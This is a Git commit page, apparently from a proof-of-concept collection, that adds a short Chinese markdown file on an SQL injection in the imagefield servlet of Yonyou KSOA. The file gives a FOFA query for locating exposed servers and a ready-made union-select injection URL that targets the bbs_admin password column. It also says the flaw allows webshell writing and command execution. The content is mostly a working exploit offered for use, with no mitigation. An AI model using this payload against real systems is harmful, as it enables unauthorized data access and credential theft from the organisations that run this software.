admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 用友时空KSOA-imagefield接口存在SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-03-24 21:29:25 +08:00 committed by GitHub
parent 1f4696fe7e
commit de4f580357
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
用友时空KSOA-imagefield接口存在SQL注入漏洞.md Normal file
View File

@ -0,0 +1,16 @@
## 用友时空KSOA-imagefield接口存在SQL注入漏洞
用友时空KSOA imagefield接口存在SQL注入漏洞黑客可以利用该漏洞执行任意SQL语句如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
## fofa
```
app="用友-时空KSOA"
```
## poc
```
/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+
```
![c6b2b6d4ba7df38952d185d684c2e60a](https://github.com/wy876/POC/assets/139549762/ba1e8364-d789-480b-bbbb-e9ab0e067950)